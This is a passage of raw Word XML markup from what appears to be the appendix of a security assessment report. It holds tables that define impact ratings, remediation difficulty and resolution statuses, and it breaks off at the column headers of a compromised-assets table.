                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2EB9DAC7" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may cause significant disruptions to non-critical business functions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B0AD5AB" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="59850A0D" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FA551EC" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Minor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6444BB5A" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may affect few users, without causing much disruption to routine business functions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD445C2" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FDF881C" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D758FE3" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421DB8A7" w14:textId="77777777" w:rsidR="00966C99" w:rsidRPr="00A836BD" w:rsidRDefault="00966C99" w:rsidP="00A836BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc177321914"/>
      <w:bookmarkStart w:id="121" w:name="_Toc178499002"/>
      <w:r w:rsidRPr="00A836BD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Difficulty Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>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966C99" w14:paraId="5A7E2F6A" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0941B98F" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39786317" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="12A6E60D" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35EDC8FB" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Hard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E4405FE" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Remediation may require extensive reconfiguration of underlying systems that is time consuming. Remediation may require disruption of normal business functions. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="6FDDCACE" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27D42F1B" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="121FE2FF" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Remediation may require minor reconfigurations or additions that may be time-intensive or expensive.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C540F59" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="5D10ADB5" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2ABA3C3F" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="45A5F6A8" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Remediation can be accomplished in a short amount of time, with little difficulty.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF46699" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52C84D1E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8FCD2F" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468ED934" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35982E07" w14:textId="2DDB0BF9" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="006D6C4B" w:rsidP="00FC7AF1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc177321917"/>
      <w:bookmarkStart w:id="123" w:name="_Toc178499003"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidR="00FC7AF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resolution Status</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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47"/>
        <w:gridCol w:w="7703"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w14:paraId="279F19C4" w14:textId="77777777" w:rsidTr="00FC7AF1">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A2A8BF9" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D48A999" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w14:paraId="6EC77738" w14:textId="77777777" w:rsidTr="00FC7AF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DAC3D1C" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Unsolved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73B12AE5" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Issue reported but not resolved. Requires further action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w14:paraId="39AC822B" w14:textId="77777777" w:rsidTr="00FC7AF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75358C10" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Under Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="224B313C" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Fixes implemented by the customer are under evaluation by the security team.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w14:paraId="4064AD83" w14:textId="77777777" w:rsidTr="00FC7AF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A0A8E61" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Accepted Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7204E226" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer has chosen not to resolve the issue, accepting the associated risk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w14:paraId="56D94543" w14:textId="77777777" w:rsidTr="00FC7AF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71614F08" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Help Wanted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D21DAF2" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer requests clarification or assistance from the security team to address the issue.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w14:paraId="4911B5FB" w14:textId="77777777" w:rsidTr="00FC7AF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="684302E3" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Solved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD2BFB7" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Vulnerability successfully resolved and verified by the security team. Risk is mitigated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="477F4A9B" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00000000" w:rsidP="00FC7AF1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="3219C1E0">
          <v:rect id="_x0000_i1028" style="width:468pt;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DEFC7" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00000000" w:rsidP="00FC7AF1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="212F7B41">
          <v:rect id="_x0000_i1029" style="width:468pt;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C48C79" w14:textId="00841DD6" w:rsidR="00FC7AF1" w:rsidRPr="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="00A836BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="appendix-b---resolution-status"/>
      <w:bookmarkStart w:id="125" w:name="_Toc178499004"/>
      <w:bookmarkEnd w:id="124"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00FC7AF1" w:rsidRPr="00A836BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Compromised Assets / Users</w:t>
      </w:r>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9"/>
        <w:gridCol w:w="963"/>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1072"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w14:paraId="3079FC33" w14:textId="77777777" w:rsidTr="00A836BD">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0504D" w:themeFill="accent2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="464DB614" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0504D" w:themeFill="accent2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E4EF8FB" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0504D" w:themeFill="accent2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B27540" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>User/Privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
